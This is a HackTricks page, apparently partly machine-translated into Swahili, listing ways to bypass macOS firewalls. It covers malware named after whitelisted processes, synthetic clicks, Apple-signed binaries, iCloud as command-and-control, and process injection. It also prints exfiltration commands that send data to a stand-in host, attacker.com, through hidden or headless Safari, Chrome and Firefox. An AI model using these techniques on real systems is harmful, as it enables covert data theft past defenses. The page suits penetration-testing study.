macOS Bypassing Firewalls

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Found techniques

Mbinu zifuatazo zimepatikana zikifanya kazi katika baadhi ya programu za firewall za macOS.

Abusing whitelist names

Kwa mfano, kuita malware kwa majina ya michakato maarufu ya macOS kama launchd

Synthetic Click

Ikiwa firewall inahitaji ruhusa kutoka kwa mtumiaji, fanya malware ibofye ruhusu

Use Apple signed binaries

Kama curl, lakini pia wengine kama whois

Well known apple domains

Firewall inaweza kuwa inaruhusu muunganisho kwa maeneo maarufu ya apple kama apple.com au icloud.com. Na iCloud inaweza kutumika kama C2.

Generic Bypass

Mawazo kadhaa ya kujaribu kupita firewalls

Check allowed traffic

Kujua trafiki inayoruhusiwa kutakusaidia kubaini maeneo ambayo yanaweza kuwa kwenye orodha ya ruhusa au programu zipi zimepewa ruhusa kuziunganisha.

lsof -i TCP -sTCP:ESTABLISHED

Kutumia DNS

Marekebisho ya DNS yanafanywa kupitia mdnsreponder programu iliyosainiwa ambayo labda itaruhusiwa kuwasiliana na seva za DNS.

Kupitia programu za kivinjari

oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Kupitia sindano za mchakato

Ikiwa unaweza kuiingiza msimbo katika mchakato ambao unaruhusiwa kuungana na seva yoyote unaweza kupita ulinzi wa firewall:

macOS Process Abuse

Marejeo

https://www.youtube.com/watch?v=UlT5KFTMn2k

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousmacOS AppleFS NextmacOS Defensive Apps

Last updated 6 days ago